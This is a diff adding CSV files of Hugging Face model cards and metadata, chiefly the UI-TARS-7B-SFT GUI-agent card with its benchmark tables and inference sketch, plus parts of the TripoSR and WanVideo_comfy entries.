* You can also try it in [our gradio demo](https://huggingface.co/spaces/stabilityai/TripoSR), or adapt the minimal sketch below
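
A hedged usage sketch follows. It is an illustration rather than the official entry point (the supported path is `run.py` in the GitHub repository); the `TSR` call signatures are taken from that repo and may differ across versions, and `input.png` / `mesh.obj` are placeholder paths.

```python
# Hedged sketch: assumes the `tsr` package from the TripoSR GitHub repository
# is importable (install its requirements first). Paths are placeholders.
import torch
from PIL import Image
from tsr.system import TSR

device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = TSR.from_pretrained(
    'stabilityai/TripoSR',
    config_name='config.yaml',  # config shipped alongside the checkpoint
    weight_name='model.ckpt',
).to(device)

image = Image.open('input.png')  # works best on a single, centered object
with torch.no_grad():
    scene_codes = model([image], device=device)  # feed-forward reconstruction
meshes = model.extract_mesh(scene_codes)         # extract a triangle mesh
meshes[0].export('mesh.obj')                     # trimesh export
```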

### Misuse, Malicious Use, and Out-of-Scope Use

The model should not be used to intentionally create or disseminate 3D models that people would foreseeably find disturbing, distressing, or offensive; or content that propagates historical or current stereotypes.","{""id"": ""stabilityai/TripoSR"", ""author"": ""stabilityai"", ""sha"": ""5b521936b01fbe1890f6f9baed0254ab6351c04a"", ""last_modified"": ""2024-08-09 08:52:03+00:00"", ""created_at"": ""2024-02-29 13:01:16+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 18326, ""downloads_all_time"": null, ""likes"": 543, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""3d"", ""image-to-3d"", ""dataset:allenai/objaverse"", ""arxiv:2311.04400"", ""arxiv:2403.02151"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""image-to-3d"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- allenai/objaverse\nlicense: mit\npipeline_tag: image-to-3d\ntags:\n- 3d\nextra_gated_fields:\n Name: text\n Email: text\n Country: text\n Organization or Affiliation: text\n I ALLOW Stability AI to email me about new model releases: checkbox"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='figures/input800.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='figures/output_examples.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.ckpt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""stabilityai/TripoSR"", ""hansyan/perflow-triposr"", ""KwabsHug/GameConfigIdea"", ""Nymbo/TripoSR"", ""gdTharusha/3D-Modle-Generator"", ""cocktailpeanut/TripoSR"", ""mrfakename/text-to-3D"", ""RamAnanth1/3D-Arena-Router"", ""IAMTFRMZA/3DGenTripoSR"", ""AleenDG/3DGenTripoSR"", ""CazC/smallville"", ""bigskaven/perflow-triposr"", ""cocktailpeanut/perflow-triposr"", ""elioonpc/TripoSRBlender"", ""tsi-org/perflow-triposr"", ""SicarioOtsutsuki/image"", ""ABHISHEKSINGH0204/to_3d_model_1"", ""seawolf2357/TripoSR"", ""mrdas/TripoSR"", ""seawolf2357/tex3"", ""Mathdesenvnonimate/TripoSR"", ""sammyview80/img_3d"", ""CaramelTEQUILA/Spriter3D"", ""hideosnes/I23D"", ""michaelj/TripoSR"", ""Haoyu7121/TripoSR"", ""SergioGreenDragon/SergioGreenDragonGenerate"", ""CrazyEric/TripoSR"", ""vibs08/Text-to-3D"", ""vibs08/Image-3D"", ""vibs08/image-3d-fastapi"", ""vibs08/FastAPI-Text-to-3D"", ""adarshh9/tripo-std"", ""ashh757/triposr-s3"", ""adarshh9/tripo-custom"", ""ashh757/tripo-custom"", ""KIMKIMKIMku/TripoSR"", ""fdyue/TripoSR"", ""Zaiiida/3D-Modle-Generator"", ""ergosumdre/TripoSR"", ""XtewaldX/TripoSR"", ""JescYip/TripoSR"", ""Mariakarkar/TripoSR"", ""Vuvo11/InteriorDesign_TripoSR"", ""vishnumeher/vhn-3d"", ""Vuvo11/InteriorBusiness_AI_API""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-09 08:52:03+00:00"", ""cardData"": ""datasets:\n- allenai/objaverse\nlicense: mit\npipeline_tag: image-to-3d\ntags:\n- 3d\nextra_gated_fields:\n Name: text\n Email: text\n Country: text\n Organization or Affiliation: text\n I ALLOW Stability AI to email me about new model releases: checkbox"", ""transformersInfo"": null, ""_id"": ""65e0801cbfa5aa61ab04294a"", ""modelId"": ""stabilityai/TripoSR"", ""usedStorage"": 
5262702691}",0,,0,,0,,0,,0,"AleenDG/3DGenTripoSR, IAMTFRMZA/3DGenTripoSR, KwabsHug/GameConfigIdea, Nymbo/TripoSR, RamAnanth1/3D-Arena-Router, ashh757/triposr-s3, cocktailpeanut/TripoSR, gdTharusha/3D-Modle-Generator, hansyan/perflow-triposr, huggingface/InferenceSupport/discussions/298, mrfakename/text-to-3D, stabilityai/TripoSR, stabilityai/stable-fast-3d, vishnumeher/vhn-3d",14

UI-TARS-7B-SFT_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
@@ -0,0 +1,197 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
ByteDance-Seed/UI-TARS-7B-SFT,"---
license: apache-2.0
language:
- en
pipeline_tag: image-text-to-text
tags:
- multimodal
- gui
library_name: transformers
---

# UI-TARS-7B-SFT

[UI-TARS-2B-SFT](https://huggingface.co/bytedance-research/UI-TARS-2B-SFT) |
[UI-TARS-7B-SFT](https://huggingface.co/bytedance-research/UI-TARS-7B-SFT) |
[**UI-TARS-7B-DPO**](https://huggingface.co/bytedance-research/UI-TARS-7B-DPO) (Recommended) |
[UI-TARS-72B-SFT](https://huggingface.co/bytedance-research/UI-TARS-72B-SFT) |
[**UI-TARS-72B-DPO**](https://huggingface.co/bytedance-research/UI-TARS-72B-DPO) (Recommended)

## Introduction

UI-TARS is a next-generation native GUI agent model designed to interact seamlessly with graphical user interfaces (GUIs) using human-like perception, reasoning, and action capabilities. Unlike traditional modular frameworks, UI-TARS integrates all key components—perception, reasoning, grounding, and memory—within a single vision-language model (VLM), enabling end-to-end task automation without predefined workflows or manual rules.

<p align=""center"">
  <img src=""https://github.com/bytedance/UI-TARS/blob/main/figures/UI-TARS-vs-Previous-SOTA.png?raw=true"" width=""90%""/>
</p>
<p align=""center"">
  <img src=""https://github.com/bytedance/UI-TARS/blob/main/figures/UI-TARS.png?raw=true"" width=""90%""/>
</p>

This repository contains the model for the paper [UI-TARS: Pioneering Automated GUI Interaction with Native Agents](https://huggingface.co/papers/2501.12326).

Code: https://github.com/bytedance/UI-TARS
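
The card itself ships no quickstart. As a hedged sketch (not the official UI-TARS prompt format; see the GitHub repository above for the real action space and prompts), the repo config declares a Qwen2-VL architecture with an `AutoProcessor`, so standard Qwen2-VL-style inference should apply; `screenshot.png` and the instruction text below are placeholders:

```python
# Hedged sketch: generic Qwen2-VL-style inference, not the official
# UI-TARS agent prompt format. 'screenshot.png' is a placeholder.
from PIL import Image
from transformers import AutoProcessor, Qwen2VLForConditionalGeneration

model_id = 'ByteDance-Seed/UI-TARS-7B-SFT'
model = Qwen2VLForConditionalGeneration.from_pretrained(
    model_id, torch_dtype='auto', device_map='auto')
processor = AutoProcessor.from_pretrained(model_id)

messages = [{'role': 'user', 'content': [
    {'type': 'image'},
    {'type': 'text', 'text': 'Locate the search box on this screenshot.'},
]}]
prompt = processor.apply_chat_template(messages, add_generation_prompt=True)
inputs = processor(text=[prompt], images=[Image.open('screenshot.png')],
                   return_tensors='pt').to(model.device)
output = model.generate(**inputs, max_new_tokens=128)
print(processor.decode(output[0][inputs['input_ids'].shape[1]:],
                       skip_special_tokens=True))
```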

## Performance
**Perception Capability Evaluation**
| Model | VisualWebBench | WebSRC | SQAshort |
|---------------------------|---------------|---------|----------|
| Qwen2-VL-7B | 73.3 | 81.8 | 84.9 |
| Qwen-VL-Max | 74.1 | 91.1 | 78.6 |
| Gemini-1.5-Pro | 75.4 | 88.9 | 82.2 |
| UIX-Qwen2-7B | 75.9 | 82.9 | 78.8 |
| Claude-3.5-Sonnet | 78.2 | 90.4 | 83.1 |
| GPT-4o | 78.5 | 87.7 | 82.3 |
| **UI-TARS-2B** | 72.9 | 89.2 | 86.4 |
| **UI-TARS-7B** | 79.7 | **93.6** | 87.7 |
| **UI-TARS-72B** | **82.8** | 89.3 | **88.6** |

**Grounding Capability Evaluation**
- **ScreenSpot Pro**

| Agent Model | Dev-Text | Dev-Icon | Dev-Avg | Creative-Text | Creative-Icon | Creative-Avg | CAD-Text | CAD-Icon | CAD-Avg | Scientific-Text | Scientific-Icon | Scientific-Avg | Office-Text | Office-Icon | Office-Avg | OS-Text | OS-Icon | OS-Avg | Avg-Text | Avg-Icon | Avg |
|--------------------------|----------|----------|----------|--------------|--------------|--------------|---------|---------|---------|---------------|---------------|---------------|------------|------------|------------|--------|--------|--------|---------|---------|------|
| QwenVL-7B | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.7 | 0.0 | 0.4 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.1 | 0.0 | **0.1** |
| GPT-4o | 1.3 | 0.0 | 0.7 | 1.0 | 0.0 | 0.6 | 2.0 | 0.0 | 1.5 | 2.1 | 0.0 | 1.2 | 1.1 | 0.0 | 0.9 | 0.0 | 0.0 | 0.0 | 1.3 | 0.0 | **0.8** |
| SeeClick | 0.6 | 0.0 | 0.3 | 1.0 | 0.0 | 0.6 | 2.5 | 0.0 | 1.9 | 3.5 | 0.0 | 2.0 | 1.1 | 0.0 | 0.9 | 2.8 | 0.0 | 1.5 | 1.8 | 0.0 | **1.1** |
| Qwen2-VL-7B | 2.6 | 0.0 | 1.3 | 1.5 | 0.0 | 0.9 | 0.5 | 0.0 | 0.4 | 6.3 | 0.0 | 3.5 | 3.4 | 1.9 | 3.0 | 0.9 | 0.0 | 0.5 | 2.5 | 0.2 | **1.6** |
| OS-Atlas-4B | 7.1 | 0.0 | 3.7 | 3.0 | 1.4 | 2.3 | 2.0 | 0.0 | 1.5 | 9.0 | 5.5 | 7.5 | 5.1 | 3.8 | 4.8 | 5.6 | 0.0 | 3.1 | 5.0 | 1.7 | **3.7** |
| ShowUI-2B | 16.9 | 1.4 | 9.4 | 9.1 | 0.0 | 5.3 | 2.5 | 0.0 | 1.9 | 13.2 | 7.3 | 10.6 | 15.3 | 7.5 | 13.5 | 10.3 | 2.2 | 6.6 | 10.8 | 2.6 | **7.7** |
| CogAgent-18B | 14.9 | 0.7 | 8.0 | 9.6 | 0.0 | 5.6 | 7.1 | 3.1 | 6.1 | 22.2 | 1.8 | 13.4 | 13.0 | 0.0 | 10.0 | 5.6 | 0.0 | 3.1 | 12.0 | 0.8 | **7.7** |
| Aria-UI | 16.2 | 0.0 | 8.4 | 23.7 | 2.1 | 14.7 | 7.6 | 1.6 | 6.1 | 27.1 | 6.4 | 18.1 | 20.3 | 1.9 | 16.1 | 4.7 | 0.0 | 2.6 | 17.1 | 2.0 | **11.3** |
| UGround-7B | 26.6 | 2.1 | 14.7 | 27.3 | 2.8 | 17.0 | 14.2 | 1.6 | 11.1 | 31.9 | 2.7 | 19.3 | 31.6 | 11.3 | 27.0 | 17.8 | 0.0 | 9.7 | 25.0 | 2.8 | **16.5** |
| Claude Computer Use | 22.0 | 3.9 | 12.6 | 25.9 | 3.4 | 16.8 | 14.5 | 3.7 | 11.9 | 33.9 | 15.8 | 25.8 | 30.1 | 16.3 | 26.9 | 11.0 | 4.5 | 8.1 | 23.4 | 7.1 | **17.1** |
| OS-Atlas-7B | 33.1 | 1.4 | 17.7 | 28.8 | 2.8 | 17.9 | 12.2 | 4.7 | 10.3 | 37.5 | 7.3 | 24.4 | 33.9 | 5.7 | 27.4 | 27.1 | 4.5 | 16.8 | 28.1 | 4.0 | **18.9** |
| UGround-V1-7B | - | - | 35.5 | - | - | 27.8 | - | - | 13.5 | - | - | 38.8 | - | - | 48.8 | - | - | 26.1 | - | - | **31.1** |
| **UI-TARS-2B** | 47.4 | 4.1 | 26.4 | 42.9 | 6.3 | 27.6 | 17.8 | 4.7 | 14.6 | 56.9 | 17.3 | 39.8 | 50.3 | 17.0 | 42.6 | 21.5 | 5.6 | 14.3 | 39.6 | 8.4 | **27.7** |
| **UI-TARS-7B** | 58.4 | 12.4 | 36.1 | 50.0 | 9.1 | 32.8 | **20.8**| 9.4 | **18.0**| 63.9 | **31.8** | **50.0** | **63.3** | 20.8 | 53.5 | 30.8 | **16.9**| 24.5 | 47.8 | 16.2 | **35.7** |
| **UI-TARS-72B** | **63.0** | **17.3** | **40.8** | **57.1** | **15.4** | **39.6** | 18.8 | **12.5**| 17.2 | **64.6** | 20.9 | 45.7 | **63.3** | **26.4** | **54.8** | **42.1**| 15.7 | **30.1**| **50.9**| **17.5**| **38.1** |


- **ScreenSpot**

| Method | Mobile-Text | Mobile-Icon/Widget | Desktop-Text | Desktop-Icon/Widget | Web-Text | Web-Icon/Widget | Avg |
|--------|-------------|-------------|-------------|-------------|-------------|---------|---------|
| **Agent Framework** | | | | | | | |
| GPT-4 (SeeClick) | 76.6 | 55.5 | 68.0 | 28.6 | 40.9 | 23.3 | **48.8** |
| GPT-4 (OmniParser) | 93.9 | 57.0 | 91.3 | 63.6 | 81.3 | 51.0 | **73.0** |
| GPT-4 (UGround-7B) | 90.1 | 70.3 | 87.1 | 55.7 | 85.7 | 64.6 | **75.6** |
| GPT-4o (SeeClick) | 81.0 | 59.8 | 69.6 | 33.6 | 43.9 | 26.2 | **52.3** |
| GPT-4o (UGround-7B) | 93.4 | 76.9 | 92.8 | 67.9 | 88.7 | 68.9 | **81.4** |
| **Agent Model** | | | | | | | |
| GPT-4 | 22.6 | 24.5 | 20.2 | 11.8 | 9.2 | 8.8 | **16.2** |
| GPT-4o | 20.2 | 24.9 | 21.1 | 23.6 | 12.2 | 7.8 | **18.3** |
| CogAgent | 67.0 | 24.0 | 74.2 | 20.0 | 70.4 | 28.6 | **47.4** |
| SeeClick | 78.0 | 52.0 | 72.2 | 30.0 | 55.7 | 32.5 | **53.4** |
| Qwen2-VL | 75.5 | 60.7 | 76.3 | 54.3 | 35.2 | 25.7 | **55.3** |
| UGround-7B | 82.8 | 60.3 | 82.5 | 63.6 | 80.4 | 70.4 | **73.3** |
| Aguvis-G-7B | 88.3 | 78.2 | 88.1 | 70.7 | 85.7 | 74.8 | **81.8** |
| OS-Atlas-7B | 93.0 | 72.9 | 91.8 | 62.9 | 90.9 | 74.3 | **82.5** |
| Claude Computer Use | - | - | - | - | - | - | **83.0** |
| Gemini 2.0 (Project Mariner) | - | - | - | - | - | - | **84.0** |
| Aguvis-7B | **95.6** | 77.7 | 93.8 | 67.1 | 88.3 | 75.2 | **84.4** |
| Aguvis-72B | 94.5 | **85.2** | 95.4 | 77.9 | **91.3** | **85.9** | **89.2** |
| **Our Model** | | | | | | | |
| **UI-TARS-2B** | 93.0 | 75.5 | 90.7 | 68.6 | 84.3 | 74.8 | **82.3** |
| **UI-TARS-7B** | 94.5 | **85.2** | **95.9** | 85.7 | 90.0 | 83.5 | **89.5** |
| **UI-TARS-72B** | 94.9 | 82.5 | 89.7 | **88.6** | 88.7 | 85.0 | **88.4** |


- **ScreenSpot v2**

| Method | Mobile-Text | Mobile-Icon/Widget | Desktop-Text | Desktop-Icon/Widget | Web-Text | Web-Icon/Widget | Avg |
|--------|-------------|-------------|-------------|-------------|-------------|---------|---------|
| **Agent Framework** | | | | | | | |
| GPT-4o (SeeClick) | 85.2 | 58.8 | 79.9 | 37.1 | 72.7 | 30.1 | **63.6** |
| GPT-4o (OS-Atlas-4B) | 95.5 | 75.8 | 79.4 | 49.3 | 90.2 | 66.5 | **79.1** |
| GPT-4o (OS-Atlas-7B) | 96.2 | 83.4 | 89.7 | 69.3 | **94.0** | 79.8 | **87.1** |
| **Agent Model** | | | | | | | |
| SeeClick | 78.4 | 50.7 | 70.1 | 29.3 | 55.2 | 32.5 | **55.1** |
| OS-Atlas-4B | 87.2 | 59.7 | 72.7 | 46.4 | 85.9 | 63.1 | **71.9** |
| OS-Atlas-7B | 95.2 | 75.8 | 90.7 | 63.6 | 90.6 | 77.3 | **84.1** |
| **Our Model** | | | | | | | |
| **UI-TARS-2B** | 95.2 | 79.1 | 90.7 | 68.6 | 87.2 | 78.3 | **84.7** |
| **UI-TARS-7B** | **96.9** | **89.1** | **95.4** | 85.0 | 93.6 | 85.2 | **91.6** |
| **UI-TARS-72B** | 94.8 | 86.3 | 91.2 | **87.9** | 91.5 | **87.7** | **90.3** |


**Offline Agent Capability Evaluation**
- **Multimodal Mind2Web**

| Method | Cross-Task Ele.Acc | Cross-Task Op.F1 | Cross-Task Step SR | Cross-Website Ele.Acc | Cross-Website Op.F1 | Cross-Website Step SR | Cross-Domain Ele.Acc | Cross-Domain Op.F1 | Cross-Domain Step SR |
|--------|----------------------|-------------------|--------------------|----------------------|--------------------|-------------------|--------------------|-------------------|-------------------|
| **Agent Framework** | | | | | | | | | |
| GPT-4o (SeeClick) | 32.1 | - | - | 33.1 | - | - | 33.5 | - | - |
| GPT-4o (UGround) | 47.7 | - | - | 46.0 | - | - | 46.6 | - | - |
| GPT-4o (Aria-UI) | 57.6 | - | - | 57.7 | - | - | 61.4 | - | - |
| GPT-4V (OmniParser) | 42.4 | 87.6 | 39.4 | 41.0 | 84.8 | 36.5 | 45.5 | 85.7 | 42.0 |
| **Agent Model** | | | | | | | | | |
| GPT-4o | 5.7 | 77.2 | 4.3 | 5.7 | 79.0 | 3.9 | 5.5 | 86.4 | 4.5 |
| GPT-4 (SOM) | 29.6 | - | 20.3 | 20.1 | - | 13.9 | 27.0 | - | 23.7 |
| GPT-3.5 (Text-only) | 19.4 | 59.2 | 16.8 | 14.9 | 56.5 | 14.1 | 25.2 | 57.9 | 24.1 |
| GPT-4 (Text-only) | 40.8 | 63.1 | 32.3 | 30.2 | 61.0 | 27.0 | 35.4 | 61.9 | 29.7 |
| Claude | 62.7 | 84.7 | 53.5 | 59.5 | 79.6 | 47.7 | 64.5 | 85.4 | 56.4 |
| Aguvis-7B | 64.2 | 89.8 | 60.4 | 60.7 | 88.1 | 54.6 | 60.4 | 89.2 | 56.6 |
| CogAgent | - | - | 62.3 | - | - | 54.0 | - | - | 59.4 |
| Aguvis-72B | 69.5 | 90.8 | 64.0 | 62.6 | 88.6 | 56.5 | 63.5 | 88.5 | 58.2 |
| **Our Model** | | | | | | | | | |
| **UI-TARS-2B** | 62.3 | 90.0 | 56.3 | 58.5 | 87.2 | 50.8 | 58.8 | 89.6 | 52.3 |
| **UI-TARS-7B** | 73.1 | 92.2 | 67.1 | 68.2 | 90.9 | 61.7 | 66.6 | 90.9 | 60.5 |
| **UI-TARS-72B** | **74.7** | **92.5** | **68.6** | **72.4** | **91.2** | **63.5** | **68.9** | **91.8** | **62.1** |


- **Android Control and GUI Odyssey**

| Agent Models | AndroidControl-Low Type | AndroidControl-Low Grounding | AndroidControl-Low SR | AndroidControl-High Type | AndroidControl-High Grounding | AndroidControl-High SR | GUIOdyssey Type | GUIOdyssey Grounding | GUIOdyssey SR |
|---------------------|----------------------|----------------------|----------------|----------------------|----------------------|----------------|----------------|----------------|----------------|
| Claude | 74.3 | 0.0 | 19.4 | 63.7 | 0.0 | 12.5 | 60.9 | 0.0 | 3.1 |
| GPT-4o | 74.3 | 0.0 | 19.4 | 66.3 | 0.0 | 20.8 | 34.3 | 0.0 | 3.3 |
| SeeClick | 93.0 | 73.4 | 75.0 | 82.9 | 62.9 | 59.1 | 71.0 | 52.4 | 53.9 |
| InternVL-2-4B | 90.9 | 84.1 | 80.1 | 84.1 | 72.7 | 66.7 | 82.1 | 55.5 | 51.5 |
| Qwen2-VL-7B | 91.9 | 86.5 | 82.6 | 83.8 | 77.7 | 69.7 | 83.5 | 65.9 | 60.2 |
| Aria-UI | -- | 87.7 | 67.3 | -- | 43.2 | 10.2 | -- | 86.8 | 36.5 |
| OS-Atlas-4B | 91.9 | 83.8 | 80.6 | 84.7 | 73.8 | 67.5 | 83.5 | 61.4 | 56.4 |
| OS-Atlas-7B | 93.6 | 88.0 | 85.2 | 85.2 | 78.5 | 71.2 | 84.5 | 67.8 | 62.0 |
| Aguvis-7B | -- | -- | 80.5 | -- | -- | 61.5 | -- | -- | -- |
| Aguvis-72B | -- | -- | 84.4 | -- | -- | 66.4 | -- | -- | -- |
| **UI-TARS-2B** | **98.1** | 87.3 | 89.3 | 81.2 | 78.4 | 68.9 | 93.9 | 86.8 | 83.4 |
| **UI-TARS-7B** | 98.0 | 89.3 | 90.8 | 83.7 | 80.5 | 72.5 | 94.6 | 90.1 | 87.0 |
| **UI-TARS-72B** | **98.1** | **89.9** | **91.3** | **85.2** | **81.5** | **74.7** | **95.4** | **91.4** | **88.6** |

**Online Agent Capability Evaluation**

| Method | OSWorld (Online) | AndroidWorld (Online) |
|--------|-------------------|------------------|
| **Agent Framework** | | |
| GPT-4o (UGround) | - | 32.8 |
| GPT-4o (Aria-UI) | 15.2 | 44.8 |
| GPT-4o (Aguvis-7B) | 14.8 | 37.1 |
| GPT-4o (Aguvis-72B) | 17.0 | - |
| GPT-4o (OS-Atlas-7B) | 14.6 | - |
| **Agent Model** | | |
| GPT-4o | 5.0 | 34.5 (SoM) |
| Gemini-Pro-1.5 | 5.4 | 22.8 (SoM) |
| Aguvis-72B | 10.3 | 26.1 |
| Claude Computer-Use | 14.9 (15 steps) | 27.9 |
| Claude Computer-Use | 22.0 (50 steps) | - |
| **Our Model** | | |
| **UI-TARS-7B-SFT** | 17.7 (15 steps) | 33.0 |
| **UI-TARS-7B-DPO** | 18.7 (15 steps) | - |
| **UI-TARS-72B-SFT** | 18.8 (15 steps) | **46.6** |
| **UI-TARS-72B-DPO** | **22.7** (15 steps) | - |
| **UI-TARS-72B-DPO** | **24.6** (50 steps) | - |


## Citation
If you find our paper and model useful in your research, feel free to give us a cite.

```BibTeX
@article{qin2025ui,
  title={UI-TARS: Pioneering Automated GUI Interaction with Native Agents},
  author={Qin, Yujia and Ye, Yining and Fang, Junjie and Wang, Haoming and Liang, Shihao and Tian, Shizuo and Zhang, Junda and Li, Jiahao and Li, Yunxin and Huang, Shijue and others},
  journal={arXiv preprint arXiv:2501.12326},
  year={2025}
}
```","{""id"": ""ByteDance-Seed/UI-TARS-7B-SFT"", ""author"": ""ByteDance-Seed"", ""sha"": ""3434901a9dd04dd3625617d839a5724fe5e2db20"", ""last_modified"": ""2025-01-25 15:05:42+00:00"", ""created_at"": ""2025-01-20 03:20:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5035, ""downloads_all_time"": null, ""likes"": 167, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2_vl"", ""image-text-to-text"", ""multimodal"", ""gui"", ""conversational"", ""en"", ""arxiv:2501.12326"", ""license:apache-2.0"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- multimodal\n- gui"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Qwen2VLForConditionalGeneration""], ""model_type"": ""qwen2_vl"", ""processor_config"": {""chat_template"": ""{% set image_count = namespace(value=0) %}{% set video_count = namespace(value=0) %}{% for message in messages %}{% if loop.first and message['role'] != 'system' %}<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n{% endif %}<|im_start|>{{ message['role'] }}\n{% if message['content'] is string %}{{ message['content'] }}<|im_end|>\n{% else %}{% for content in message['content'] %}{% if content['type'] == 'image' or 'image' in content or 'image_url' in content %}{% set image_count.value = image_count.value + 1 %}{% if add_vision_id %}Picture {{ image_count.value }}: {% endif %}<|vision_start|><|image_pad|><|vision_end|>{% elif content['type'] == 'video' or 'video' in content %}{% set video_count.value = video_count.value + 1 %}{% if add_vision_id %}Video {{ video_count.value }}: {% endif %}<|vision_start|><|video_pad|><|vision_end|>{% elif 'text' in content %}{{ content['text'] }}{% endif %}{% endfor %}<|im_end|>\n{% endif %}{% endfor %}{% if add_generation_prompt %}<|im_start|>assistant\n{% endif %}""}, ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% set image_count = namespace(value=0) %}{% set video_count = namespace(value=0) %}{% for message in messages %}{% if loop.first and message['role'] != 'system' %}<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n{% endif %}<|im_start|>{{ message['role'] }}\n{% if message['content'] is string %}{{ message['content'] }}<|im_end|>\n{% else %}{% for content in message['content'] %}{% if content['type'] == 'image' or 'image' in content or 'image_url' in content %}{% set image_count.value = image_count.value + 1 %}{% if add_vision_id %}Picture {{ image_count.value }}: {% endif %}<|vision_start|><|image_pad|><|vision_end|>{% elif content['type'] == 'video' or 'video' in content %}{% set video_count.value = video_count.value + 1 %}{% if add_vision_id %}Video {{ video_count.value }}: {% endif %}<|vision_start|><|video_pad|><|vision_end|>{% elif 'text' in content %}{{ content['text'] }}{% endif %}{% endfor %}<|im_end|>\n{% endif %}{% endfor %}{% if add_generation_prompt %}<|im_start|>assistant\n{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", 
""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='chat_template.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00007.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""bytedance-research/UI-TARS"", ""Aheader/gui_test_app"", ""lonnieh81/UI-TARS""], ""safetensors"": {""parameters"": {""F32"": 8291375616}, ""total"": 8291375616}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-25 15:05:42+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- multimodal\n- gui"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""678dc101dd26e0e24c871337"", ""modelId"": ""ByteDance-Seed/UI-TARS-7B-SFT"", ""usedStorage"": 33177002171}",0,,0,,0,"https://huggingface.co/bartowski/UI-TARS-7B-SFT-GGUF, https://huggingface.co/mradermacher/UI-TARS-7B-SFT-GGUF, https://huggingface.co/mradermacher/UI-TARS-7B-SFT-i1-GGUF",3,,0,"Aheader/gui_test_app, bytedance-research/UI-TARS, huggingface/InferenceSupport/discussions/new?title=ByteDance-Seed/UI-TARS-7B-SFT&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BByteDance-Seed%2FUI-TARS-7B-SFT%5D(%2FByteDance-Seed%2FUI-TARS-7B-SFT)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, lonnieh81/UI-TARS",4

WanVideo_comfy_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
@@ -0,0 +1,8 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
Kijai/WanVideo_comfy,"Combined and quantized models for WanVideo, originating from here:

https://huggingface.co/Wan-AI/

Can be used with: https://github.com/kijai/ComfyUI-WanVideoWrapper
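
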